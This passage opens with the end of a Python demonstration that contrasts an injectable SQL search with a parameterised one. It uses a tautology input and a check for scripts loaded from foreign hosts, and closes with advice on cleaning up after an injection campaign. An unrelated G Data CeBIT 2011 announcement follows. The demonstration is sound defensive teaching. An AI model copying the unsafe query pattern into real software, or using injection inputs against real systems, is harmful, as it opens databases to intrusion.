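    print("safe search:  ", search_safe(db, tautology))    # no title equals that string
    print("foreign script hosts:", find_external_scripts(db, {"www.example.org"}))
```

The unsafe variant returns all three rows for the tautology input, while the parameterised one returns nothing because the whole string is compared as a title; the same unsafe code also breaks on an ordinary apostrophe in a legitimate search. For a real clean-up after such a campaign, every query path gets the parameterised form and every text column is scanned, not just the one shown here.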


CeBIT 2011 and G Data

CeBIT starts on March 1st in Hannover, showcasing the latest developments in the IT industry. G Data is using the largest IT trade show in the world this year to launch the next generation of security for businesses and home users. G Data presents this year’s trade fair highlight: Generation 11 of its network solutions, equipped with a powerful backup module in all Enterprise versions. Also being revealed is G Data MobileSecurity, a security solution for Android phones. Mobile phone owners will thus be able to effectively secure their mobiles against malware. Another first that will be announced in Hannover is G Data CloudSecurity. This free browser plug-in blocks infected websites, making surfing the internet more secure. Besides presenting these innovations, the provider from Bochum, Germany is also offering a comprehensive programme in the G Data Arena, Hall 11, Booth D35.

I personally will take part in the Global Conferences during a panel session about the importance of security, which is detailed below. It’s an interesting line-up of experienced speakers, CEOs and VPs who will be sitting next to me. I will be available for interviews and chats the whole week (minus Saturday) at our booth. By the way, I like my new title: Global Security Officer. ;-)